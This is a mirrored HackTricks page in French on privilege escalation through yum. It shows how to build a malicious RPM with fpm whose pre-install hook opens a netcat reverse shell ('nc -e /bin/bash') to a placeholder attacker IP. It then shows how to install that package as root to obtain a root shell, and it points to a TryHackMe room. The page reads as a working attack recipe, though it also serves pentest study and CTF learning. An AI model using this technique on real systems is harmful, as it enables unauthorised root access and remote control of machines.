Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

2.9 KiB
Raw Blame History

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

D'autres exemples autour de yum peuvent également être trouvés sur gtfobins.

Exécution de commandes arbitraires via les packages RPM

Vérification de l'environnement

Pour exploiter ce vecteur, l'utilisateur doit être capable d'exécuter des commandes yum en tant qu'utilisateur à privilèges élevés, c'est-à-dire root.

Un exemple de travail de ce vecteur

Un exemple de travail de cette exploitation peut être trouvé dans la salle daily bugle sur tryhackme.

Emballage d'un RPM

Dans la section suivante, je couvrirai l'emballage d'un shell inversé dans un RPM en utilisant fpm.

L'exemple ci-dessous crée un package qui inclut un déclencheur avant l'installation avec un script arbitraire pouvant être défini par l'attaquant. Lorsqu'il est installé, ce package exécutera la commande arbitraire. J'ai utilisé un exemple simple de shell netcat inversé à des fins de démonstration, mais cela peut être modifié selon les besoins.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Attraper un shell

En utilisant l'exemple ci-dessus et en supposant que yum peut être exécuté en tant qu'utilisateur à privilèges élevés.

  1. Transférer le rpm vers l'hôte
  2. Démarrer un écouteur sur votre hôte local tel que le exemple d'écouteur netcat
  3. Installer le package vulnérable yum localinstall -y exploited-1.0-1.noarch.rpm